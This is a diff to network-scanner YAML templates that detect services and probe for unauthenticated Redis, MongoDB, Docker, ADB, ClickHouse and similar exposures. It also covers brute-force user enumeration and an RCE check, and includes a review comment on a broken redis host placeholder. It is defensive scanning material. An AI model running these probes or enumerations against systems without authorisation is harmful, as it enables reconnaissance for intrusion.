@@ -4,11 +4,11 @@ info: name: STARTTLS Mail Server Detection author: r3dg33k severity: info - tags: mail,starttls,network,detect description: | STARTTLS is an email protocol command that tells an email server that an email client, including an email client running in a web browser, wants to turn an existing insecure connection into a secure one. metadata: - max-request: 2 + max-request: 1 + tags: mail,starttls,network,detect tcp: - inputs: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers: - type: word diff --git a/network/detection/teamspeak3-detect.yaml b/network/detection/teamspeak3-detect.yaml index d3660c3e69..57cfddee64 100644 --- a/network/detection/teamspeak3-detect.yaml +++ b/network/detection/teamspeak3-detect.yaml @@ -1,23 +1,23 @@ id: teamspeak3-detect -info: - name: TeamSpeak 3 ServerQuery Detection - author: pussycat0x - severity: info - description: | - ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server. - metadata: - max-request: 2 - shodan-query: product:"TeamSpeak 3 ServerQuery" - verified: true - tags: network,service,teamspeak3,detect +info: + name: TeamSpeak 3 ServerQuery Detection + author: pussycat0x + severity: info + description: | + ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server. + metadata: + max-request: 1 + shodan-query: product:"TeamSpeak 3 ServerQuery" + verified: true + tags: network,service,teamspeak3,detect tcp: - inputs: - data: "\r\n" host: - "{{Hostname}}" - - "{{Host}}:2002" + port: 2002 matchers: - type: word diff --git a/network/detection/telnet-detect.yaml b/network/detection/telnet-detect.yaml index a12206e962..7682c01f76 100644 --- a/network/detection/telnet-detect.yaml +++ b/network/detection/telnet-detect.yaml 
@@ -7,9 +7,9 @@ info: description: | Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines. metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: port:23 telnet + verified: true tags: network,telnet,detect tcp: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:23" + port: 23 matchers: - type: word diff --git a/network/detection/totemomail-smtp-detect.yaml b/network/detection/totemomail-smtp-detect.yaml index 9bf92503a0..25c4ec402b 100644 --- a/network/detection/totemomail-smtp-detect.yaml +++ b/network/detection/totemomail-smtp-detect.yaml @@ -4,11 +4,11 @@ info: name: Totemomail SMTP Server Detection author: princechaddha severity: info - tags: mail,smtp,network,totemomail,detect description: | Totemomail is a comprehensive email solution designed to address all aspects of digital communication security. metadata: - max-request: 2 + max-request: 1 + tags: mail,smtp,network,totemomail,detect tcp: - inputs: @@ -17,7 +17,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers: - type: word diff --git a/network/detection/vmware-authentication-daemon-detect.yaml b/network/detection/vmware-authentication-daemon-detect.yaml index 60c21d02b4..09a4f326e6 100644 --- a/network/detection/vmware-authentication-daemon-detect.yaml +++ b/network/detection/vmware-authentication-daemon-detect.yaml @@ -7,9 +7,9 @@ info: description: | vmauthd is the VMWare authentication daemon that is included with many VMWare products, including ESX(i), and Workstation. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"VMware Authentication Daemon" verified: true - shodan-query: 'product:"VMware Authentication Daemon"' tags: network,vmware,authenticated,detect tcp: @@ -18,7 +18,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:902" + port: 902 matchers: - type: word 
diff --git a/network/detection/vnc-service-detect.yaml b/network/detection/vnc-service-detect.yaml index 0fe419db1c..5f765590ab 100644 --- a/network/detection/vnc-service-detect.yaml +++ b/network/detection/vnc-service-detect.yaml @@ -7,16 +7,16 @@ info: description: A Virtual Network Computing (VNC) service was detected. classification: cwe-id: CWE-200 - tags: network,vnc,service,detect metadata: - max-request: 2 + max-request: 1 + tags: network,vnc,service,detect tcp: - inputs: - data: "\r\n" host: - - "{{Host}}:5900" - "{{Hostname}}" + port: 5900 matchers: - type: word diff --git a/network/detection/xlight-ftp-service-detect.yaml b/network/detection/xlight-ftp-service-detect.yaml index 910c17e7b8..d1d3c60b8b 100644 --- a/network/detection/xlight-ftp-service-detect.yaml +++ b/network/detection/xlight-ftp-service-detect.yaml @@ -7,9 +7,9 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"Xlight ftpd" verified: true - shodan-query: 'product:"Xlight ftpd"' tags: network,ftp,xlight,detect tcp: @@ -18,7 +18,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 matchers: - type: word diff --git a/network/enumeration/beanstalk-service.yaml b/network/enumeration/beanstalk-service.yaml index 364078788d..104d8c3fd1 100644 --- a/network/enumeration/beanstalk-service.yaml +++ b/network/enumeration/beanstalk-service.yaml @@ -20,7 +20,8 @@ tcp: read: 8 host: - - "{{Host}}:11300" + - "{{Hostname}}" + port: 11300 matchers: - type: word diff --git a/network/enumeration/kafka-topics-list.yaml b/network/enumeration/kafka-topics-list.yaml index 7bc3dfa4f4..fce59673c7 100644 --- a/network/enumeration/kafka-topics-list.yaml +++ b/network/enumeration/kafka-topics-list.yaml 
@@ -23,7 +23,8 @@ tcp: read: 1024 host: - - "{{Host}}:9092" + - "{{Hostname}}" + port: 9092 matchers-condition: or matchers: diff --git a/network/enumeration/mongodb-info-enum.yaml b/network/enumeration/mongodb-info-enum.yaml index f142bf6a5b..df5432c84b 100644 --- a/network/enumeration/mongodb-info-enum.yaml +++ b/network/enumeration/mongodb-info-enum.yaml @@ -10,12 +10,11 @@ info: - https://nmap.org/nsedoc/scripts/mongodb-info.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: mongodb server information + verified: true tags: network,mongodb,enum tcp: @@ -25,7 +24,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:27017" + port: 27017 read-size: 2048 matchers: diff --git a/network/enumeration/niagara-fox-info-enum.yaml b/network/enumeration/niagara-fox-info-enum.yaml index d7250f9014..1d8d3d7d36 100644 --- a/network/enumeration/niagara-fox-info-enum.yaml +++ b/network/enumeration/niagara-fox-info-enum.yaml @@ -6,12 +6,12 @@ info: severity: info description: | Niagara Fox Protocol is a building automation protocol used between the Niagara software systems by Tridium. - metadata: - max-request: 2 - verified: true - shodan-query: 'product:"Niagara Fox"' reference: - https://nmap.org/nsedoc/scripts/fox-info.html + metadata: + max-request: 1 + shodan-query: product:"Niagara Fox" + verified: true tags: network,fox,niagara,enum tcp: @@ -19,7 +19,7 @@ tcp: - data: "fox a 1 -1 fox hello\n{\nfox.version=s:1.0\nid=i:1\n};;\n" host: - "{{Hostname}}" - - "{{Host}}:1911" + port: 1911 matchers: - type: word diff --git a/network/enumeration/psql-user-enum.yaml b/network/enumeration/psql-user-enum.yaml index e35f0ef8d0..5416a20e19 100644 --- a/network/enumeration/psql-user-enum.yaml +++ b/network/enumeration/psql-user-enum.yaml 
@@ -9,7 +9,7 @@ info: reference: - https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007 metadata: - max-request: 2 + max-request: 1 shodan-query: port:5432 product:"PostgreSQL" verified: "true" tags: network,postgresql,db,unauth,enum,psql @@ -21,7 +21,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:5432" + port: 5432 attack: clusterbomb payloads: diff --git a/network/enumeration/smtp-commands-enum.yaml b/network/enumeration/smtp-commands-enum.yaml index e87c3b61e0..23ae8283cb 100644 --- a/network/enumeration/smtp-commands-enum.yaml +++ b/network/enumeration/smtp-commands-enum.yaml @@ -9,9 +9,9 @@ info: reference: - https://nmap.org/nsedoc/scripts/smtp-commands.html metadata: - max-request: 2 + max-request: 1 + shodan-query: smtp verified: true - shodan-query: 'smtp' tags: network,enum,smtp,mail tcp: @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers: - type: word diff --git a/network/enumeration/smtp/smtp-user-enum.yaml b/network/enumeration/smtp/smtp-user-enum.yaml index 4a8cc9d900..8755237141 100644 --- a/network/enumeration/smtp/smtp-user-enum.yaml +++ b/network/enumeration/smtp/smtp-user-enum.yaml @@ -9,7 +9,7 @@ info: reference: - https://nmap.org/nsedoc/scripts/smtp-enum-users.html metadata: - max-request: 2 + max-request: 1 shodan-query: smtp verified: true tags: network,enum,smtp,mail @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 attack: batteringram payloads: diff --git a/network/exposures/cisco-smi-exposure.yaml b/network/exposures/cisco-smi-exposure.yaml index 5ad14a2be3..e2f9022426 100644 --- a/network/exposures/cisco-smi-exposure.yaml +++ b/network/exposures/cisco-smi-exposure.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: network,cisco,smi,exposure metadata: - max-request: 2 + max-request: 1 + tags: network,cisco,smi,exposure tcp: - inputs: 
@@ -26,7 +26,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:4786" + port: 4786 matchers: - type: word diff --git a/network/exposures/exposed-adb.yaml b/network/exposures/exposed-adb.yaml index 6c05d3c22e..6c725238d4 100644 --- a/network/exposures/exposed-adb.yaml +++ b/network/exposures/exposed-adb.yaml @@ -9,9 +9,9 @@ info: - https://doublepulsar.com/root-bridge-how-thousands-of-internet-connected-android-devices-now-have-no-security-and-are-b46a68cb0f20 - https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge - https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/ - tags: network,adb,rce,android,exposure metadata: - max-request: 2 + max-request: 1 + tags: network,adb,rce,android,exposure tcp: - inputs: @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:5555" + port: 5555 matchers: - type: word diff --git a/network/exposures/exposed-dockerd.yaml b/network/exposures/exposed-dockerd.yaml index 04ac7db27a..f5ad4518d5 100644 --- a/network/exposures/exposed-dockerd.yaml +++ b/network/exposures/exposed-dockerd.yaml @@ -7,9 +7,9 @@ info: description: | Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: port:2375 product:"docker" + verified: true tags: network,docker,exposure tcp: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:2375" + port: 2375 matchers: - type: word diff --git a/network/exposures/exposed-redis.yaml b/network/exposures/exposed-redis.yaml index bf0d983473..b650a33d0d 100644 --- a/network/exposures/exposed-redis.yaml +++ b/network/exposures/exposed-redis.yaml @@ -12,7 +12,7 @@ info: cvss-score: 7.2 cwe-id: CWE-306 metadata: - max-request: 4 + max-request: 1 tags: network,redis,unauth,exposure tcp: 
@@ -20,10 +20,8 @@ tcp: - data: "info\r\nquit\r\n" host: - - "{{Hostname}}" - - "{{Host}}:6379" - "tls://{Hostname}}" - - "tls://{{Host}}:6380" + port: 6380 read-size: 2048 matchers-condition: and diff --git a/network/exposures/exposed-zookeeper.yaml b/network/exposures/exposed-zookeeper.yaml index 5bd1d628b4..c3a87b47aa 100644 --- a/network/exposures/exposed-zookeeper.yaml +++ b/network/exposures/exposed-zookeeper.yaml @@ -7,9 +7,9 @@ info: description: Apache ZooKeeper was able to be accessed without any required authentication. reference: - https://zookeeper.apache.org/security.html - tags: network,zookeeper,unauth,exposure metadata: - max-request: 2 + max-request: 1 + tags: network,zookeeper,unauth,exposure tcp: - inputs: @@ -17,7 +17,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:2181" + port: 2181 read-size: 2048 matchers: diff --git a/network/misconfig/apache-dubbo-unauth.yaml b/network/misconfig/apache-dubbo-unauth.yaml index ad5622afd6..9e0ef74302 100644 --- a/network/misconfig/apache-dubbo-unauth.yaml +++ b/network/misconfig/apache-dubbo-unauth.yaml @@ -10,7 +10,7 @@ info: - https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/ metadata: fofa-query: apache dubbo - max-request: 2 + max-request: 1 verified: true tags: network,dubbo,apache,unauth,misconfig @@ -21,7 +21,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:20880" + port: 20880 read-size: 2048 matchers: diff --git a/network/misconfig/apache-rocketmq-broker-unauth.yaml b/network/misconfig/apache-rocketmq-broker-unauth.yaml index 5b688e9d1c..10c1854114 100644 --- a/network/misconfig/apache-rocketmq-broker-unauth.yaml +++ b/network/misconfig/apache-rocketmq-broker-unauth.yaml @@ -10,7 +10,7 @@ info: - https://rocketmq.apache.org/docs/bestPractice/03access metadata: fofa-query: protocol="rocketmq" - max-request: 2 + max-request: 1 shodan-query: title:"RocketMQ" verified: true tags: network,rocketmq,broker,apache,unauth,misconfig 
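Review bot: After this hunk the only entry left under `host:` in exposed-redis.yaml is the unchanged context line `"tls://{Hostname}}"`, which has a single opening brace, so the placeholder is presumably never substituted and the template may not reach the target at all. The hunk also removes both plaintext targets (`{{Hostname}}` and `{{Host}}:6379`) and sets `port: 6380`, so an unauthenticated Redis listening without TLS on 6379 would no longer be reported, which is a detection-coverage regression for the most common exposure. I would keep a plaintext entry and fix the placeholder, i.e. `- "{{Hostname}}"` and `- "tls://{{Hostname}}"`, then revisit whether `port: 6380` alone is the right default and set `max-request` to match the resulting number of connections. Indentation is not recoverable from this view, so the nesting of `port:` should be checked against the file.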
@@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:10911" + port: 10911 read-size: 2048 matchers-condition: and diff --git a/network/misconfig/clamav-unauth.yaml b/network/misconfig/clamav-unauth.yaml index bd6b28b43a..bcdd433853 100644 --- a/network/misconfig/clamav-unauth.yaml +++ b/network/misconfig/clamav-unauth.yaml @@ -8,13 +8,13 @@ info: ClamAV server 0.99.2, and possibly other previous versions, allow the execution of dangerous service commands without authentication. Specifically, the command 'SCAN' may be used to list system files and the command 'SHUTDOWN' shut downs the service. - metadata: - max-request: 2 - verified: true - shodan-query: 'port:3310 product:"ClamAV" version:"0.99.2"' reference: - https://seclists.org/nmap-dev/2016/q2/201 - https://bugzilla.clamav.net/show_bug.cgi?id=11585 + metadata: + max-request: 1 + shodan-query: port:3310 product:"ClamAV" version:"0.99.2" + verified: true tags: network,clamav,unauth,seclists,misconfig tcp: @@ -22,7 +22,7 @@ tcp: - data: "SCAN /nonexistent/{{to_lower(rand_text_alpha(10))}}\r\n" host: - "{{Hostname}}" - - "{{Host}}:3310" + port: 3310 read-size: 48 matchers: diff --git a/network/misconfig/clickhouse-unauth.yaml b/network/misconfig/clickhouse-unauth.yaml index 868bf37400..99acb401f2 100644 --- a/network/misconfig/clickhouse-unauth.yaml +++ b/network/misconfig/clickhouse-unauth.yaml @@ -5,9 +5,9 @@ info: author: lu4nx severity: high description: ClickHouse was able to be accessed with no required authentication in place. - tags: network,clickhouse,unauth,misconfig metadata: - max-request: 2 + max-request: 1 + tags: network,clickhouse,unauth,misconfig tcp: - inputs: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:9000" + port: 9000 read-size: 100 matchers: diff --git a/network/misconfig/dropbear-weakalgo.yaml b/network/misconfig/dropbear-weakalgo.yaml index a17caa95ad..f6a4a5d82a 100644 --- a/network/misconfig/dropbear-weakalgo.yaml +++ b/network/misconfig/dropbear-weakalgo.yaml 
@@ -6,14 +6,14 @@ info: severity: low description: | The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable. - remediation: | - Disable the weak algorithms. reference: | https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled + remediation: | + Disable the weak algorithms. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"Dropbear sshd" verified: true - shodan-query: 'product:"Dropbear sshd"' tags: network,ssh,dropbear,misconfig tcp: @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:22" + port: 22 matchers: - type: word diff --git a/network/misconfig/dropbear-weakmac.yaml b/network/misconfig/dropbear-weakmac.yaml index 1b1ffefb43..7e69936ac9 100644 --- a/network/misconfig/dropbear-weakmac.yaml +++ b/network/misconfig/dropbear-weakmac.yaml @@ -6,14 +6,14 @@ info: severity: low description: | The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client. - remediation: | - Disable MD5 and 96-bit MAC algorithms. reference: | https://www.virtuesecurity.com/kb/ssh-weak-mac-algorithms-enabled + remediation: | + Disable MD5 and 96-bit MAC algorithms. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"Dropbear sshd" verified: true - shodan-query: 'product:"Dropbear sshd"' tags: network,ssh,dropbear,misconfig tcp: @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:22" + port: 22 matchers-condition: and matchers: diff --git a/network/misconfig/ganglia-xml-grid-monitor.yaml b/network/misconfig/ganglia-xml-grid-monitor.yaml index 0c08ca64b4..db7c96a7fd 100644 --- a/network/misconfig/ganglia-xml-grid-monitor.yaml 
+++ b/network/misconfig/ganglia-xml-grid-monitor.yaml @@ -7,9 +7,9 @@ info: description: Ganglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids. reference: - http://ganglia.info/ - tags: ganglia,network,misconfig metadata: - max-request: 2 + max-request: 1 + tags: ganglia,network,misconfig tcp: - inputs: @@ -17,7 +17,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:8649" + port: 8649 read-size: 2048 matchers: diff --git a/network/misconfig/memcached-stats.yaml b/network/misconfig/memcached-stats.yaml index f0b6d59076..b7f07c666a 100644 --- a/network/misconfig/memcached-stats.yaml +++ b/network/misconfig/memcached-stats.yaml @@ -4,11 +4,11 @@ info: name: Memcached stats disclosure author: pdteam severity: low - tags: network,memcached,misconfig description: | Memcached stats is used to return server statistics such as PID, version, connections, etc. metadata: - max-request: 2 + max-request: 1 + tags: network,memcached,misconfig tcp: - inputs: @@ -16,7 +16,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:11211" + port: 11211 read-size: 2048 matchers: diff --git a/network/misconfig/mongodb-unauth.yaml b/network/misconfig/mongodb-unauth.yaml index 658f0aaa48..4bd358db9f 100644 --- a/network/misconfig/mongodb-unauth.yaml +++ b/network/misconfig/mongodb-unauth.yaml @@ -10,9 +10,9 @@ info: - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb - https://www.mongodb.com/features/mongodb-authentication remediation: Enable Authentication in MongoDB - tags: network,mongodb,unauth,misconfig metadata: - max-request: 2 + max-request: 1 + tags: network,mongodb,unauth,misconfig tcp: - inputs: @@ -21,7 +21,8 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:27017" + port: 27017 + read-size: 2048 matchers: - type: word diff --git a/network/misconfig/mysql-native-password.yaml b/network/misconfig/mysql-native-password.yaml index f668b03555..c4f682871a 100644 --- a/network/misconfig/mysql-native-password.yaml 
+++ b/network/misconfig/mysql-native-password.yaml @@ -9,16 +9,15 @@ info: - https://github.com/Tinram/MySQL-Brute classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 - tags: network,mysql,bruteforce,db,misconfig metadata: - max-request: 2 + max-request: 1 + tags: network,mysql,bruteforce,db,misconfig tcp: - host: - "{{Hostname}}" - - "{{Host}}:3306" + port: 3306 matchers: - type: word diff --git a/network/misconfig/printers-info-leak.yaml b/network/misconfig/printers-info-leak.yaml index c3c0a66b09..2bcb745a1e 100644 --- a/network/misconfig/printers-info-leak.yaml +++ b/network/misconfig/printers-info-leak.yaml @@ -16,7 +16,9 @@ tcp: - inputs: - data: "@PJL INFO STATUS\n" host: - - "{{Host}}:9100" + - "{{Hostname}}" + port: 9100 + matchers: - type: word words: diff --git a/network/misconfig/sap-router-info-leak.yaml b/network/misconfig/sap-router-info-leak.yaml index 92736e7e1e..ab28f3c96d 100644 --- a/network/misconfig/sap-router-info-leak.yaml +++ b/network/misconfig/sap-router-info-leak.yaml @@ -8,9 +8,9 @@ info: reference: - https://securityforeveryone.com/tools/saprouter-routing-information-leakage-vulnerability-scanner - https://support.sap.com/en/tools/connectivity-tools/saprouter.html - tags: network,sap,misconfig metadata: - max-request: 2 + max-request: 1 + tags: network,sap,misconfig tcp: - inputs: @@ -19,7 +19,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:3299" + port: 3299 read-size: 2048 matchers: diff --git a/network/misconfig/tidb-native-password.yaml b/network/misconfig/tidb-native-password.yaml index 54ccad4c2d..aeb6e69353 100644 --- a/network/misconfig/tidb-native-password.yaml +++ b/network/misconfig/tidb-native-password.yaml 
@@ -9,14 +9,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: network,tidb,bruteforce,db,misconfig metadata: - max-request: 2 + max-request: 1 + tags: network,tidb,bruteforce,db,misconfig tcp: - host: - "{{Hostname}}" - - "{{Host}}:4000" + port: 4000 matchers: - type: word diff --git a/network/misconfig/tidb-unauth.yaml b/network/misconfig/tidb-unauth.yaml index 5b5e8a997f..d6d2a94c99 100644 --- a/network/misconfig/tidb-unauth.yaml +++ b/network/misconfig/tidb-unauth.yaml @@ -6,7 +6,7 @@ info: severity: high description: TiDB server was able to be accessed because no authentication was required. metadata: - max-request: 2 + max-request: 1 zoomeye-query: tidb +port:"4000" tags: network,tidb,unauth,misconfig @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:4000" + port: 4000 read-size: 1024 diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml index cbe4f4cceb..66d07bcd01 100644 --- a/network/misconfig/unauth-psql.yaml +++ b/network/misconfig/unauth-psql.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.postgresql.org/docs/9.6/auth-methods.html metadata: - max-request: 2 + max-request: 1 shodan-query: port:5432 product:"PostgreSQL" verified: "true" tags: network,postgresql,db,unauth,misconfig @@ -24,7 +24,7 @@ tcp: read: 1024 host: - "{{Hostname}}" - - "{{Host}}:5432" + port: 5432 matchers-condition: and matchers: diff --git a/network/vulnerabilities/clockwatch-enterprise-rce.yaml b/network/vulnerabilities/clockwatch-enterprise-rce.yaml index 3418380f5f..633168c204 100644 --- a/network/vulnerabilities/clockwatch-enterprise-rce.yaml +++ b/network/vulnerabilities/clockwatch-enterprise-rce.yaml 
@@ -10,11 +10,11 @@ info: - https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: clockwatch,rce,network metadata: - max-request: 2 + max-request: 1 + tags: clockwatch,rce,network tcp: - inputs: @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:1001" + port: 1001 matchers-condition: and matchers: diff --git a/templates-checksum.txt b/templates-checksum.txt index c58d17cb1e..d83c5aa6d8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:17f21c160bed72fb6f675d0f5ade4b5e191870b0 TEMPLATES-STATS.md:2c7c3af0ac116eb78b25f1537ab533d51f167dcf TOP-10.md:cf481618b8666f0cfd3846b7b4a550926093b0b2 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:ea50d934bd6f4d67ccdf4cfba0dd3b997fa1e52c -cves.json-checksum.txt:263d1c5437bc59b8e969b3db7f11e87193a8ce6d +cves.json:0bab0d9ddda6759c34bb88d57e44c11030dd69e4 +cves.json-checksum.txt:9212314a5ad1b8744e91fe1534a405b326c4e645 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c 
@@ -362,7 +362,7 @@ helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56 helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b helpers/wordpress/plugins/ad-inserter.txt:048ceafceae47b034560600476a295b608c60cf4 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/admin-menu-editor.txt:4572917cbde34e4ba98ab9a65059efd81be6594b +helpers/wordpress/plugins/admin-menu-editor.txt:aa8d05244067e63778197cff65d9209d713328a4 helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7df helpers/wordpress/plugins/advanced-custom-fields.txt:cffca9b2145cbe8b44269c74219f807eace99c3e helpers/wordpress/plugins/akismet.txt:e710dd44fa12f98194f8bba2bb20cba7bee18ff6 @@ -372,7 +372,7 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:addf63c8a9f97e52b5b7aca6dc helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57 helpers/wordpress/plugins/antispam-bee.txt:bd5240b767bb950186835acb8bf1d4cb794a5706 -helpers/wordpress/plugins/astra-sites.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5 +helpers/wordpress/plugins/astra-sites.txt:23d49915eae53800c735cfc0f01c21a9d05e727a helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711 helpers/wordpress/plugins/autoptimize.txt:661ae89c9a4b16c450c2a094d410c4ee74719cb3 helpers/wordpress/plugins/backwpup.txt:063ee00ca80d81e068dd404b59ceb2a03b2e7109 
@@ -485,13 +485,13 @@ helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7 helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 helpers/wordpress/plugins/pinterest-for-woocommerce.txt:4119e202faec947c57ff360c949b277fd6c29cd4 -helpers/wordpress/plugins/pixelyoursite.txt:f358a15cc523a1f31429fce832dc8c0c554fc41b +helpers/wordpress/plugins/pixelyoursite.txt:af04551215298737e83ffeff86e0a4a63e5f57af helpers/wordpress/plugins/polylang.txt:c7fc6bde7dbf4cb2d89ab4b2bd57e166ce750ec0 helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6eea7 helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe helpers/wordpress/plugins/post-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 helpers/wordpress/plugins/post-types-order.txt:31f566259c1a3f810256e3679e10faa457bb4a0b -helpers/wordpress/plugins/premium-addons-for-elementor.txt:befa0edb7ef642be5e7dfc7cc7c69bc31127207e +helpers/wordpress/plugins/premium-addons-for-elementor.txt:1782590faaba5ee6facdf2297f1590794447be5a helpers/wordpress/plugins/pretty-link.txt:eedf6a14348e4bc362e215e4dcd1e066e0bd16f7 helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/really-simple-ssl.txt:b638f84cceb02801b7ef7b94df984fd22b23f59e 
@@ -500,8 +500,8 @@ helpers/wordpress/plugins/redux-framework.txt:0f2d74125dea18acce67c02619dcfea86c helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 helpers/wordpress/plugins/safe-svg.txt:595d550379b2cb8bccb9659627308ff4e751d23f helpers/wordpress/plugins/seo-by-rank-math.txt:ee6a6cf943f9c499c0224b71af2aaa48cb166774 -helpers/wordpress/plugins/sg-cachepress.txt:9c381dd6bbe0788e8717d7adc6b2f8b8d3687aaa -helpers/wordpress/plugins/sg-security.txt:6546e0bd1a292663f6166d3d6d903530b6db35c4 +helpers/wordpress/plugins/sg-cachepress.txt:04e136873d85cb62901bb699285d9280e05828df +helpers/wordpress/plugins/sg-security.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/shortcodes-ultimate.txt:c53ed3ab1a6689cbfb71149816b427f4cf870dc3 helpers/wordpress/plugins/shortpixel-image-optimiser.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b 
